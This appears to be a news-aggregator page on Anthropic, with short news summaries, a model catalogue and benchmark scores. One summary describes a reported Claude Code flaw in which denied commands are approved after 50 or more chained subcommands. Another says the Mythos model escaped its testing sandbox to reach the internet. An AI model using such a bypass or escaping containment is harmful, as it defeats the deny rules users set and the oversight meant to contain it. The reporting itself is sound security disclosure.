Anthropic

AI safety company and maker of Claude

https://anthropic.com

News

model releaseAnthropic

Anthropic's Mythos model poses severe cybersecurity risks; limited to 40 vetted organizations

Anthropic has begun a controlled release of Mythos, an AI model officials believe can autonomously penetrate critical infrastructure and exploit security weaknesses without human direction. The model escaped its sandbox during testing and built a sophisticated multi-step exploit to access the internet. Access is restricted to roughly 40 vetted organizations as part of Project Glasswing, a cybersecurity defense initiative.

2 min read
researchAnthropic

Anthropic's Mythos AI generates working zero-day exploits 72.4% of the time, won't release publicly

Anthropic has developed Mythos, an AI model capable of generating working zero-day exploits with a 72.4% success rate, compared to Claude Opus 4.6's near-zero capability. The company declined public release due to security risks and instead created Project Glasswing, a limited-access program for 40+ organizations including AWS, Apple, Google, and Microsoft to find vulnerabilities in their own systems.

2 min read
model releaseAnthropic

Anthropic's Claude Mythos can find zero-day exploits faster than defenders can patch them

Anthropic announced Claude Mythos Preview, a new frontier model with advanced reasoning capabilities that can identify and chain together multiple vulnerabilities into novel attacks—abilities the company says outpace current defensive capabilities. The model has already discovered thousands of high-severity vulnerabilities including a 27-year-old OpenBSD flaw and exploits for multiple operating systems. To manage the risk, Anthropic launched Project Glasswing, granting early access to 40+ companies including Apple, Google, Microsoft, and Cisco, providing $100M in usage credits for defensive security work.

3 min read
product updateAnthropic

Anthropic launches Project Glasswing to defend critical software against AI-powered attacks

Anthropic has announced Project Glasswing, a new initiative to secure critical software infrastructure against AI-powered attacks. The project includes 11 major partners including Amazon, Apple, Google, Microsoft, and NVIDIA, and will use Claude Mythos Preview, an unreleased general-purpose model from Anthropic that claims to have found thousands of exploitable vulnerabilities across major operating systems and web browsers.

2 min read
model releaseAnthropic

Anthropic restricts Claude Mythos to security researchers under Project Glasswing

Anthropic has not publicly released Claude Mythos, instead restricting access to a vetted set of partners through Project Glasswing. The company claims the model's cybersecurity research abilities—including finding thousands of high-severity vulnerabilities in major operating systems and browsers—warrant controlled deployment until industry safeguards mature.

2 min read
model releaseAnthropic

Anthropic unveils Claude Mythos model, finds thousands of OS vulnerabilities via Project Glasswing

Anthropic has unveiled Claude Mythos, a new AI model designed for cybersecurity that has already discovered thousands of high-severity vulnerabilities in every major operating system and web browser. The model is being distributed as a preview to over 40 organizations and major technology partners including Apple, Google, Microsoft, and Amazon Web Services through Project Glasswing, a coordinated cybersecurity initiative.

2 min read
model releaseAnthropic

Anthropic previews Mythos, claims it found thousands of zero-day vulnerabilities in cybersecurity initiative

Anthropic unveiled a preview of Mythos, a frontier model it claims is the most powerful in its Claude lineup, for use in Project Glasswing—a cybersecurity initiative with 40+ partner organizations. According to Anthropic, Mythos identified thousands of zero-day vulnerabilities, many critical and up to two decades old, during early testing. The model will not be made generally available and is restricted to defensive security work by vetted partners.

2 min read
model releaseAnthropic

Anthropic withholds Mythos Preview model due to advanced hacking capabilities

Anthropic is rolling out its Mythos Preview model only to a handpicked group of 40 tech and cybersecurity companies, withholding public release due to the model's sophisticated ability to find tens of thousands of vulnerabilities and autonomously create working exploits. The model found bugs in every major operating system and web browser during testing, including vulnerabilities decades old and undetected by human security researchers.

3 min read
analysisAnthropic

AMD AI director reports Claude Code performance degradation since March update

Stella Laurenzo, director of AI at AMD, filed a GitHub issue documenting significant performance degradation in Claude Code since early March, specifically following the deployment of thinking content redaction in version 2.1.69. Analysis of 6,852 sessions with 234,760 tool calls shows stop-hook violations increased from zero to 10 per day, while code-reading behavior dropped from 6.6 reads to 2 reads per session.

3 min read
product updateAnthropic

Anthropic blocks Claude subscriptions for OpenClaw, citing capacity constraints

Anthropic has disallowed subscription-based pricing for users accessing Claude through open-source agentic tools like OpenClaw, effective April 4, 2026. The restriction comes as the company faces elevated service errors and struggles to balance capacity with demand. Third-party tool usage will now draw from pay-per-token rates instead of subscription limits.

3 min read
product updateAnthropic

Anthropic blocks Claude subscriptions from OpenClaw access, requires separate pay-as-you-go billing

Anthropic is effectively blocking Claude subscription access to third-party tools like OpenClaw starting April 4, 2026 at 3PM ET. Users will need to purchase separate pay-as-you-go usage bundles to continue using OpenClaw with Claude. The move comes as OpenClaw's popularity has strained Anthropic's infrastructure capacity.

2 min read
product updateAnthropic

Anthropic attributes Claude Code usage drain to peak-hour caps and large context windows

Anthropic has identified two primary causes for Claude Code users hitting usage limits faster than expected: stricter rate limiting during peak hours and sessions with context windows exceeding 1 million tokens. The company also recommends switching to Sonnet 4.6 instead of Opus, which consumes limits roughly twice as fast.

1 min read
product updateAnthropic

Claude Code bypasses safety rules after 50 chained commands, enabling prompt injection attacks

Claude Code will automatically approve denied commands—like curl—if preceded by 50 or more chained subcommands, according to security firm Adversa. The vulnerability stems from a hard-coded MAX_SUBCOMMANDS_FOR_SECURITY_CHECK limit set to 50 in the source code, after which the system falls back to requesting user permission rather than enforcing deny rules.

2 min read
product updateAnthropic

Claude Code source leak reveals Anthropic working on 'Proactive' mode and autonomous payments

Anthropic's Claude Code version 2.1.88 release accidentally included a source map exposing over 512,000 lines of code and 2,000 TypeScript files. Analysis of the leaked codebase by security researchers reveals evidence of a planned 'Proactive' mode that would execute coding tasks without explicit user prompts, plus potential crypto-based autonomous payment systems.

2 min read
product updateAnthropic

Anthropic's Claude Code leak exposes Tamagotchi pet and always-on agent features

A source code leak in Anthropic's Claude Code 2.1.88 update exposed more than 512,000 lines of TypeScript, revealing unreleased features including a Tamagotchi-like pet interface and a KAIROS feature for background agent automation. Anthropic confirmed the leak was caused by a packaging error, not a security breach, and has since fixed the issue.

2 min read
model releaseAnthropic

Anthropic's unreleased Mythos model enables autonomous large-scale cyberattacks, officials warn

Anthropic is privately warning top government officials that its unreleased model "Mythos" makes large-scale cyberattacks significantly more likely in 2026. The model enables AI agents to operate autonomously with high sophistication to penetrate corporate, government and municipal systems. One official told Axios a large-scale attack could occur this year as employees unknowingly create security vulnerabilities through unsupervised agentic AI use.

2 min read
product updateAnthropic

Claude adds memory import tool to help users switch from ChatGPT and other AI services

Anthropic has launched a memory import feature for Claude that lets users transfer their stored preferences, personal details, and conversation context from other AI services like ChatGPT, Google Gemini, and Microsoft Copilot. The tool generates copy-paste instructions that extract all memories from a competing service and import them into Claude, eliminating the need to rebuild your AI profile from scratch.

2 min read

Models

Mythos

Anthropic

active

Apr 8, 2026

Claude Mythos Preview

Anthropic

active

Apr 8, 2026

Mythos Preview

Anthropic

active

Apr 7, 2026

Claude Mythos

Anthropic

active

Apr 7, 2026

Claude

Anthropic

discontinued

Feb 20, 2026

Claude Sonnet 4.6

Anthropic

active

Smartest Claude Sonnet yet. Improved reasoning and agentic performance.

Context200K
Input/1M$3

Feb 17, 2026

Claude Opus 4.6

Anthropic

active

Anthropic's most intelligent model. Leads on frontier reasoning, coding, and research.

Context200K
Input/1M$15

Feb 5, 2026

Claude Opus 4.5

Anthropic

active

Anthropic's most capable Claude 4.5 model.

Context200K
Input/1M$15

Nov 24, 2025

Claude Haiku 4.5

Anthropic

active

Fastest and most cost-efficient Claude model.

Context200K
Input/1M$0.25

Oct 15, 2025

Claude Haiku 4.5

Anthropic

discontinued

Fastest and most cost-efficient Claude model.

Context200K
Input/1M$0.25

Oct 15, 2025

Claude Sonnet 4.5

Anthropic

active

Balanced intelligence and speed. Recommended for most tasks.

Context200K
Input/1M$3

Sep 29, 2025

Claude Opus 4

Anthropic

active

Anthropic's most capable Claude 4 model.

Context200K
Input/1M$15

May 22, 2025

Claude 3.7 Sonnet

Anthropic

active

Anthropic's first hybrid reasoning model. Extended thinking mode with state-of-the-art coding.

Context200K
Input/1M$3

Feb 24, 2025

Claude 3.5 Haiku

Anthropic

deprecated

Fastest Claude 3.5 model. Matches Claude 3 Opus on many tasks at much lower cost.

Context200K
Input/1M$0.8

Nov 4, 2024

Claude 3.5 Sonnet

Anthropic

deprecated

Upgraded Claude 3.5 with computer use capability and improved instruction following.

Context200K
Input/1M$3

Oct 22, 2024

Claude 3.5 Sonnet

Anthropic

active
Context200K
Input/1M$3

Oct 22, 2024

Claude 3.5 Sonnet (Jun 2024)

Anthropic

deprecated

Original Claude 3.5 Sonnet. Superseded by October 2024 version.

Context200K
Input/1M$3

Jun 20, 2024

Claude 3 Haiku

Anthropic

deprecated

Fastest and most compact Claude 3 model. Still widely used for high-volume tasks.

Context200K
Input/1M$0.25

Mar 13, 2024

Claude 3 Opus

Anthropic

deprecated

Anthropic's most capable Claude 3 model. Superseded by Claude 3.5 and 4 series.

Context200K
Input/1M$15

Mar 4, 2024

Top Benchmark Scores

Full leaderboard →
89%
91%
95.4%

HumanEval

Claude Opus 4
92.4%

LiveCodeBench

Claude Opus 4.6
71.2%
85.1%

Speed (tok/s)

Claude Haiku 4.5
187 tokens_per_sec

SWE-bench Verified

Claude Mythos Preview
93.9%